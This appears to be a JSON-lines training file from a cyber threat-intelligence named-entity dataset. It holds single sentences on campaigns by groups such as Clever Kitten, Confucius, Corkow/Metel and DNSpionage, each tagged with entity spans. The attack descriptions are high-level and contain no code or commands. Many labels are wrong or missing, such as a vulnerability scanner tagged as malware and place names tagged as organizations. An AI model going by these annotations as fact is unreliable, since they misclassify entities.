{"text": "Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001854", "source": "dnrti_train"}}
{"text": "A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": {"THREAT_ACTOR: Clever Kitten": [[2, 15]], "TOOL: web vulnerability scanner": [[48, 73]]}, "info": {"id": "dnrti_train_001855", "source": "dnrti_train"}}
{"text": "The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": {"MALWARE: Acunetix Web Vulnerability Scanner": [[34, 68]]}, "info": {"id": "dnrti_train_001856", "source": "dnrti_train"}}
{"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "dnrti_train_001857", "source": "dnrti_train"}}
{"text": "The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) .", "spans": {}, "info": {"id": "dnrti_train_001858", "source": "dnrti_train"}}
{"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system .", "spans": {}, "info": {"id": "dnrti_train_001859", "source": "dnrti_train"}}
{"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection .", "spans": {}, "info": {"id": "dnrti_train_001860", "source": "dnrti_train"}}
{"text": "This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": {}, "info": {"id": "dnrti_train_001861", "source": "dnrti_train"}}
{"text": "Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed .", "spans": {}, "info": {"id": "dnrti_train_001862", "source": "dnrti_train"}}
{"text": "Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host .", "spans": {"THREAT_ACTOR: Clever Kitten": [[0, 13]]}, "info": {"id": "dnrti_train_001863", "source": "dnrti_train"}}
{"text": "The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted .", "spans": {"ORGANIZATION: Arab": [[86, 90]], "ORGANIZATION: Emirates": [[91, 99]]}, "info": {"id": "dnrti_train_001864", "source": "dnrti_train"}}
{"text": "There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog .", "spans": {"TOOL: Django": [[84, 90]]}, "info": {"id": "dnrti_train_001865", "source": "dnrti_train"}}
{"text": "n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants .", "spans": {"TOOL: DNS tunneling": [[79, 92]]}, "info": {"id": "dnrti_train_001866", "source": "dnrti_train"}}
{"text": "Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"ORGANIZATION: Linux computers": [[93, 108]]}, "info": {"id": "dnrti_train_001867", "source": "dnrti_train"}}
{"text": "The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": {"ORGANIZATION: Arab Emirates": [[86, 99]]}, "info": {"id": "dnrti_train_001868", "source": "dnrti_train"}}
{"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": {"TOOL: decoy documents": [[4, 19]], "VULNERABILITY: InPage exploits": [[32, 47]]}, "info": {"id": "dnrti_train_001869", "source": "dnrti_train"}}
{"text": "The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": {"TOOL: InPage": [[11, 17]], "ORGANIZATION: Kaspersky": [[120, 129]]}, "info": {"id": "dnrti_train_001870", "source": "dnrti_train"}}
{"text": "The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents .", "spans": {"MALWARE: decoy documents": [[4, 19]]}, "info": {"id": "dnrti_train_001871", "source": "dnrti_train"}}
{"text": "While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": {"TOOL: InPage software": [[40, 55]], "ORGANIZATION: Unit42": [[110, 116]], "VULNERABILITY: InPage exploits": [[139, 154]], "ORGANIZATION: Kaspersky": [[250, 259]]}, "info": {"id": "dnrti_train_001872", "source": "dnrti_train"}}
{"text": "Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"ORGANIZATION: military personnel": [[86, 104]], "ORGANIZATION: businessmen": [[109, 120]]}, "info": {"id": "dnrti_train_001873", "source": "dnrti_train"}}
{"text": "Tweety Chat 's Android version can record audio , too .", "spans": {"TOOL: Tweety Chat": [[0, 11]]}, "info": {"id": "dnrti_train_001874", "source": "dnrti_train"}}
{"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": {"THREAT_ACTOR: Patchwork": [[171, 180]]}, "info": {"id": "dnrti_train_001875", "source": "dnrti_train"}}
{"text": "Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"THREAT_ACTOR: Patchwork": [[12, 21]], "VULNERABILITY: CVE-2015-1641": [[191, 204]], "VULNERABILITY: CVE-2017-11882": [[209, 223]]}, "info": {"id": "dnrti_train_001876", "source": "dnrti_train"}}
{"text": "Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"THREAT_ACTOR: Patchwork": [[57, 66]], "THREAT_ACTOR: Confucius groups": [[71, 87]]}, "info": {"id": "dnrti_train_001877", "source": "dnrti_train"}}
{"text": "Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia .", "spans": {"ORGANIZATION: Trend Micro": [[19, 30]], "THREAT_ACTOR: Patchwork": [[66, 75]], "THREAT_ACTOR: Confucius groups": [[80, 96]]}, "info": {"id": "dnrti_train_001878", "source": "dnrti_train"}}
{"text": "One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files .", "spans": {"TOOL: swissknife2": [[27, 38]]}, "info": {"id": "dnrti_train_001879", "source": "dnrti_train"}}
{"text": "During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": {}, "info": {"id": "dnrti_train_001880", "source": "dnrti_train"}}
{"text": "During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": {}, "info": {"id": "dnrti_train_001881", "source": "dnrti_train"}}
{"text": "Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters .", "spans": {"TOOL: Command-and-Control": [[48, 67]]}, "info": {"id": "dnrti_train_001882", "source": "dnrti_train"}}
{"text": "This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper .", "spans": {"TOOL: sctrls": [[72, 78]], "TOOL: sip_telephone": [[83, 96]]}, "info": {"id": "dnrti_train_001883", "source": "dnrti_train"}}
{"text": "This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": {}, "info": {"id": "dnrti_train_001884", "source": "dnrti_train"}}
{"text": "The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost .", "spans": {"TOOL: Badnews malware": [[25, 40]], "THREAT_ACTOR: Patchwork": [[297, 306]]}, "info": {"id": "dnrti_train_001886", "source": "dnrti_train"}}
{"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective .", "spans": {"THREAT_ACTOR: Confucius": [[19, 28]], "THREAT_ACTOR: Patchwork": [[33, 42]]}, "info": {"id": "dnrti_train_001887", "source": "dnrti_train"}}
{"text": "The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks .", "spans": {"ORGANIZATION: IT departments": [[20, 34]]}, "info": {"id": "dnrti_train_001888", "source": "dnrti_train"}}
{"text": "Patchwork uses email as an entry point , which is why securing the email gateway is important .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]]}, "info": {"id": "dnrti_train_001889", "source": "dnrti_train"}}
{"text": "This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": {}, "info": {"id": "dnrti_train_001890", "source": "dnrti_train"}}
{"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": {}, "info": {"id": "dnrti_train_001891", "source": "dnrti_train"}}
{"text": "In 2013 , Rapid7 reported on a series of relatively amateur attacks against Pakistani targets .", "spans": {"ORGANIZATION: Rapid7": [[10, 16]]}, "info": {"id": "dnrti_train_001892", "source": "dnrti_train"}}
{"text": "The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"MALWARE: CONFUCIUS_A": [[29, 40]], "TOOL: SNEEPY": [[159, 165]], "TOOL: ByeByeShell": [[172, 183]], "ORGANIZATION: Rapid7": [[204, 210]]}, "info": {"id": "dnrti_train_001893", "source": "dnrti_train"}}
{"text": "At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"MALWARE: CONFUCIUS_B": [[16, 27]], "MALWARE: CONFUCIUS_A": [[50, 61]], "TOOL: SFX binary files": [[100, 116]]}, "info": {"id": "dnrti_train_001894", "source": "dnrti_train"}}
{"text": "We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"TOOL: SNEEPY/BYEBYESHELL": [[147, 165]], "MALWARE: CONFUCIUS_B": [[174, 185]], "TOOL: Hangover": [[207, 215]]}, "info": {"id": "dnrti_train_001896", "source": "dnrti_train"}}
{"text": "The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B .", "spans": {"ORGANIZATION: development company": [[153, 172]], "MALWARE: CONFUCIUS_A": [[187, 198]], "MALWARE: CONFUCIUS_B": [[203, 214]]}, "info": {"id": "dnrti_train_001897", "source": "dnrti_train"}}
{"text": "In this blog post , we discussed two separate malware variations that behave in very similar ways and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": {}, "info": {"id": "dnrti_train_001898", "source": "dnrti_train"}}
{"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"TOOL: Confucius'": [[0, 10]], "VULNERABILITY: CVE-2015-1641": [[105, 118]], "VULNERABILITY: CVE-2017-11882": [[123, 137]]}, "info": {"id": "dnrti_train_001900", "source": "dnrti_train"}}
{"text": "We dove deeper into Confucius' operations—namely , the malware-ridden documents , backdoors , and file stealers they use in their campaigns .", "spans": {}, "info": {"id": "dnrti_train_001901", "source": "dnrti_train"}}
{"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"TOOL: sctrls backdoor": [[4, 19]], "VULNERABILITY: CVE-2015-1641": [[73, 86]]}, "info": {"id": "dnrti_train_001902", "source": "dnrti_train"}}
{"text": "In August 2015 a new incident related to the Corkow ( Metel ) Trojan was detected .", "spans": {"TOOL: Corkow": [[45, 51]], "THREAT_ACTOR: Metel": [[54, 59]]}, "info": {"id": "dnrti_train_001904", "source": "dnrti_train"}}
{"text": "Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd , which enabled the fraud to be committed .", "spans": {"TOOL: Corkow": [[0, 6]]}, "info": {"id": "dnrti_train_001905", "source": "dnrti_train"}}
{"text": "According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"MALWARE: botnet encompassed": [[63, 81]], "ORGANIZATION: financial institutions": [[156, 178]]}, "info": {"id": "dnrti_train_001906", "source": "dnrti_train"}}
{"text": "The interest among hackers in targeting trading systems is expected to grow .", "spans": {}, "info": {"id": "dnrti_train_001907", "source": "dnrti_train"}}
{"text": "Russian-speaking hackers are believed to be responsible for these attacks and used the Corkow Trojan .", "spans": {"TOOL: Corkow Trojan": [[87, 100]]}, "info": {"id": "dnrti_train_001908", "source": "dnrti_train"}}
{"text": "Hackers target primarily companies in Russia and CIS countries , though it is noticed that the amount of attacks targeting the USA has increased 5 times since 2011 .", "spans": {"ORGANIZATION: primarily companies": [[15, 34]]}, "info": {"id": "dnrti_train_001909", "source": "dnrti_train"}}
{"text": "One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": {"TOOL: Quik": [[79, 83]], "TOOL: Ranbyus": [[90, 97]]}, "info": {"id": "dnrti_train_001910", "source": "dnrti_train"}}
{"text": "As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "TOOL: Corkow": [[73, 79]]}, "info": {"id": "dnrti_train_001911", "source": "dnrti_train"}}
{"text": "Hackers gained access to a computer in the trading system in September 2014 .", "spans": {}, "info": {"id": "dnrti_train_001912", "source": "dnrti_train"}}
{"text": "Starting in December 2014 , the criminal group began running keyloggers in the infected system .", "spans": {"TOOL: keyloggers": [[61, 71]]}, "info": {"id": "dnrti_train_001913", "source": "dnrti_train"}}
{"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites .", "spans": {}, "info": {"id": "dnrti_train_001914", "source": "dnrti_train"}}
{"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "TOOL: mail tracking websites": [[85, 107]], "TOOL: news portals": [[110, 122]], "TOOL: electronic books": [[125, 141]], "TOOL: computer graphics resources": [[144, 171]], "TOOL: music portals": [[174, 187]]}, "info": {"id": "dnrti_train_001915", "source": "dnrti_train"}}
{"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[27, 45]], "VULNERABILITY: CottonCastle": [[67, 79]]}, "info": {"id": "dnrti_train_001916", "source": "dnrti_train"}}
{"text": "Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: financial institutions": [[58, 80]], "TOOL: Corkow malware": [[130, 144]]}, "info": {"id": "dnrti_train_001917", "source": "dnrti_train"}}
{"text": "Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": {}, "info": {"id": "dnrti_train_001918", "source": "dnrti_train"}}
{"text": "According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"TOOL: Corkow": [[26, 32]], "ORGANIZATION: users": [[51, 56]]}, "info": {"id": "dnrti_train_001919", "source": "dnrti_train"}}
{"text": "Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"TOOL: Corkow": [[25, 31]]}, "info": {"id": "dnrti_train_001920", "source": "dnrti_train"}}
{"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"VULNERABILITY: Niteris exploit": [[45, 60]]}, "info": {"id": "dnrti_train_001922", "source": "dnrti_train"}}
{"text": "In addition to the legitimate AmmyAdmin tool , the hackers used Visconti Backdoor developed based on legitimate RMS ( remote manipulator system ) software .", "spans": {"TOOL: AmmyAdmin tool": [[30, 44]], "TOOL: Visconti Backdoor": [[64, 81]], "TOOL: RMS": [[112, 115]]}, "info": {"id": "dnrti_train_001923", "source": "dnrti_train"}}
{"text": "To obtain logins and passwords they applied keyloggers built into Corkow , as well as a commonly used feature of Mimikatz , dumping clear text Windows credentials from LSA .", "spans": {"TOOL: keyloggers": [[44, 54]], "TOOL: Corkow": [[66, 72]]}, "info": {"id": "dnrti_train_001925", "source": "dnrti_train"}}
{"text": "Hackers used the remote access to detect servers of their interest in the internal network .", "spans": {}, "info": {"id": "dnrti_train_001926", "source": "dnrti_train"}}
{"text": "In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": {"ORGANIZATION: financial institutions": [[51, 73]]}, "info": {"id": "dnrti_train_001927", "source": "dnrti_train"}}
{"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services .", "spans": {"TOOL: Metel": [[0, 5]], "TOOL: banking Trojan": [[11, 25]], "THREAT_ACTOR: Corkow": [[42, 48]]}, "info": {"id": "dnrti_train_001928", "source": "dnrti_train"}}
{"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": {}, "info": {"id": "dnrti_train_001929", "source": "dnrti_train"}}
{"text": "With this level of access , the gang has been able to pull off a clever trick by automating the rollback of ATM transactions .", "spans": {}, "info": {"id": "dnrti_train_001930", "source": "dnrti_train"}}
{"text": "COVELLITE operates globally with targets primarily in Europe , East Asia , and North America .", "spans": {}, "info": {"id": "dnrti_train_001931", "source": "dnrti_train"}}
{"text": "US targets emerged in September 2017 with a small , targeted phishing campaign directed at select U.S. electric companies .", "spans": {"ORGANIZATION: electric companies": [[103, 121]]}, "info": {"id": "dnrti_train_001932", "source": "dnrti_train"}}
{"text": "LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 .", "spans": {"ORGANIZATION: Sony Pictures": [[73, 86]]}, "info": {"id": "dnrti_train_001933", "source": "dnrti_train"}}
{"text": "Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits .", "spans": {"TOOL: COVELLITE malware": [[22, 39]], "TOOL: LAZARUS toolkits": [[74, 90]]}, "info": {"id": "dnrti_train_001934", "source": "dnrti_train"}}
{"text": "COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": {}, "info": {"id": "dnrti_train_001935", "source": "dnrti_train"}}
{"text": "Given the group 's specific interest in infrastructure operations , rapidly improving capabilities , and history of aggressive targeting , Dragos considers this group a primary threat to the ICS industry .", "spans": {"ORGANIZATION: Dragos": [[139, 145]]}, "info": {"id": "dnrti_train_001936", "source": "dnrti_train"}}
{"text": "Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {}, "info": {"id": "dnrti_train_001937", "source": "dnrti_train"}}
{"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video .", "spans": {}, "info": {"id": "dnrti_train_001940", "source": "dnrti_train"}}
{"text": "FrozenCell is the mobile component of a multi-platform attack we've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 \" , use to spy on victims through compromised mobile devices and desktops .", "spans": {"TOOL: FrozenCell": [[0, 10]], "THREAT_ACTOR: Scorpion/APT-C-23": [[110, 127]]}, "info": {"id": "dnrti_train_001941", "source": "dnrti_train"}}
{"text": "Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": {"THREAT_ACTOR: Desert Falcons": [[0, 14]]}, "info": {"id": "dnrti_train_001943", "source": "dnrti_train"}}
{"text": "FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"TOOL: FrozenCell masquerades": [[0, 22]], "ORGANIZATION: Facebook": [[65, 73]], "ORGANIZATION: WhatsApp": [[76, 84]], "ORGANIZATION: Messenger": [[87, 96]], "ORGANIZATION: LINE": [[99, 103]], "ORGANIZATION: LoveChat": [[110, 118]]}, "info": {"id": "dnrti_train_001944", "source": "dnrti_train"}}
{"text": "It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) .", "spans": {"THREAT_ACTOR: Desert Falcons": [[15, 29]], "ORGANIZATION: National Liberation Front": [[279, 304]]}, "info": {"id": "dnrti_train_001946", "source": "dnrti_train"}}
{"text": "We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": {"TOOL: VAMP": [[41, 45]], "THREAT_ACTOR: APT-C-23": [[89, 97]]}, "info": {"id": "dnrti_train_001948", "source": "dnrti_train"}}
{"text": "VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others .", "spans": {"TOOL: VAMP": [[0, 4]]}, "info": {"id": "dnrti_train_001949", "source": "dnrti_train"}}
{"text": "Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": {"ORGANIZATION: Trend Micro": [[11, 22]], "TOOL: GnatSpy": [[96, 103]]}, "info": {"id": "dnrti_train_001950", "source": "dnrti_train"}}
{"text": "On Nov. 27 , 2018 , Cisco 's Talos research division published a write-up outlining the contours of a sophisticated cyber espionage campaign it dubbed DNSpionage .", "spans": {"ORGANIZATION: Cisco 's Talos": [[20, 34]]}, "info": {"id": "dnrti_train_001951", "source": "dnrti_train"}}
{"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers .", "spans": {"ORGANIZATION: Talos": [[0, 5]], "TOOL: VPN": [[291, 294]]}, "info": {"id": "dnrti_train_001952", "source": "dnrti_train"}}
{"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "dnrti_train_001953", "source": "dnrti_train"}}
{"text": "That changed on Jan. 25 , 2019 , when security firm CrowdStrike published a blog post listing virtually every Internet address known to be ( ab )used by the espionage campaign to date .", "spans": {"ORGANIZATION: security firm": [[38, 51]], "ORGANIZATION: CrowdStrike": [[52, 63]]}, "info": {"id": "dnrti_train_001954", "source": "dnrti_train"}}
{"text": "Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": {"ORGANIZATION: companies": [[226, 235]], "ORGANIZATION: government agencies": [[240, 259]]}, "info": {"id": "dnrti_train_001955", "source": "dnrti_train"}}
{"text": "PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": {}, "info": {"id": "dnrti_train_001956", "source": "dnrti_train"}}
{"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information .", "spans": {"ORGANIZATION: government agencies": [[58, 77]]}, "info": {"id": "dnrti_train_001957", "source": "dnrti_train"}}
{"text": "In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", "spans": {"TOOL: Android APKs": [[189, 201]]}, "info": {"id": "dnrti_train_001958", "source": "dnrti_train"}}
{"text": "We named the actor DustSquad and have provided private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware .", "spans": {"THREAT_ACTOR: DustSquad": [[19, 28]], "TOOL: Windows malware": [[149, 164]]}, "info": {"id": "dnrti_train_001959", "source": "dnrti_train"}}
{"text": "In this blogpost we cover a malicious program for Windows called Octopus that mostly targets diplomatic entities .", "spans": {"TOOL: Octopus": [[65, 72]], "ORGANIZATION: diplomatic entities": [[93, 112]]}, "info": {"id": "dnrti_train_001960", "source": "dnrti_train"}}
{"text": "We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": {"ORGANIZATION: Kaspersky": [[51, 60]], "TOOL: Octopus": [[129, 136]]}, "info": {"id": "dnrti_train_001961", "source": "dnrti_train"}}
{"text": "From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": {}, "info": {"id": "dnrti_train_001962", "source": "dnrti_train"}}
{"text": "Kaspersky Lab products detect the Octopus Trojan as Trojan.Win32.Octopus.gen .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "TOOL: Octopus Trojan": [[34, 48]]}, "info": {"id": "dnrti_train_001963", "source": "dnrti_train"}}
{"text": "Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"ORGANIZATION: Political entities": [[0, 18]], "THREAT_ACTOR: IndigoZebra": [[102, 113]], "THREAT_ACTOR: Sofacy": [[116, 122]], "TOOL: Zebrocy malware": [[130, 145]], "TOOL: Octopus malware": [[186, 201]]}, "info": {"id": "dnrti_train_001964", "source": "dnrti_train"}}
{"text": "El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here .", "spans": {"ORGANIZATION: Kaspersky": [[82, 91]]}, "info": {"id": "dnrti_train_001965", "source": "dnrti_train"}}
{"text": "We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": {}, "info": {"id": "dnrti_train_001966", "source": "dnrti_train"}}
{"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection .", "spans": {}, "info": {"id": "dnrti_train_001967", "source": "dnrti_train"}}
{"text": "In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor .", "spans": {"TOOL: Octopus": [[15, 22]]}, "info": {"id": "dnrti_train_001968", "source": "dnrti_train"}}
{"text": "Targets included a wide array of high-profile entities , including intelligence services , military , utility providers ( telecommunications and power ) , embassies , and government institutions .", "spans": {"ORGANIZATION: utility providers": [[102, 119]], "ORGANIZATION: embassies": [[155, 164]], "ORGANIZATION: government institutions": [[171, 194]]}, "info": {"id": "dnrti_train_001969", "source": "dnrti_train"}}
{"text": "Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware .", "spans": {"ORGANIZATION: Kaspersky Lab": [[18, 31]]}, "info": {"id": "dnrti_train_001970", "source": "dnrti_train"}}
{"text": "It was a targeted attack we are calling \" Machete \" .", "spans": {}, "info": {"id": "dnrti_train_001971", "source": "dnrti_train"}}
{"text": "At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"TOOL: Java related application": [[36, 60]], "MALWARE: Java file": [[148, 157]]}, "info": {"id": "dnrti_train_001972", "source": "dnrti_train"}}
{"text": "\" Machete \" is a targeted attack campaign with Spanish speaking roots .", "spans": {}, "info": {"id": "dnrti_train_001973", "source": "dnrti_train"}}
{"text": "The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks .", "spans": {"TOOL: decoy slideshows": [[4, 20]]}, "info": {"id": "dnrti_train_001974", "source": "dnrti_train"}}
{"text": "In some cases , such as Russia , the target appears to be an embassy from one of the countries of this list .", "spans": {"ORGANIZATION: embassy": [[61, 68]]}, "info": {"id": "dnrti_train_001975", "source": "dnrti_train"}}
{"text": "Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code .", "spans": {}, "info": {"id": "dnrti_train_001976", "source": "dnrti_train"}}
{"text": "We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": {"ORGANIZATION: Tibet": [[126, 131]], "ORGANIZATION: Brussels": [[144, 152]], "ORGANIZATION: Drewla": [[174, 180]], "ORGANIZATION: Tibetan": [[185, 192]]}, "info": {"id": "dnrti_train_001977", "source": "dnrti_train"}}
{"text": "Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community .", "spans": {"ORGANIZATION: Tibetan community": [[189, 206]]}, "info": {"id": "dnrti_train_001978", "source": "dnrti_train"}}
